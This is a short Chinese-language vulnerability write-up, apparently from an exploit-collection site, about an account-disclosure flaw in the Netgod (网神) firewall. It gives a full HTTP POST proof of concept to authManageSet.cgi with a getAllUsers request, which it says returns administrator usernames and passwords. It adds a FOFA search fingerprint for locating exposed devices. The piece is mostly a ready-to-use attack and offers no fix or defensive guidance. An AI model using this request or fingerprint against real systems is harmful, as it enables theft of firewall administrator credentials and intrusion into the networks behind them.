1.简介
网神防火墙是一款中国知名网络安全公司启明星辰开发的防火墙产品。它提供了全面的网络安全防护功能,旨在保护企业网络免受各种网络威胁和攻击.
该产品存在用户账号信息泄露漏洞,通过构造特定数据包,获取防火墙管理员登录的账号密码.
2.漏洞描述
网神防火墙用户账号信息泄露漏洞,通过构造特定数据包,获取防火墙管理员登录的账号密码。
3.漏洞复现
POC
POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
Host: xx.xxx.xxx.xx:8889
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 77
Origin: http://xx.xxx.xxx.xx:8889
Connection: close
Referer: http://xx.xxx.xxx.xx:8889/index.htmltype=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc
修改请求行以及请求参数就可以直接获取到管理员账号密码.
4.网络空间搜索引擎搜索
fofa查询
body="sec_gate_image/login_02.gif"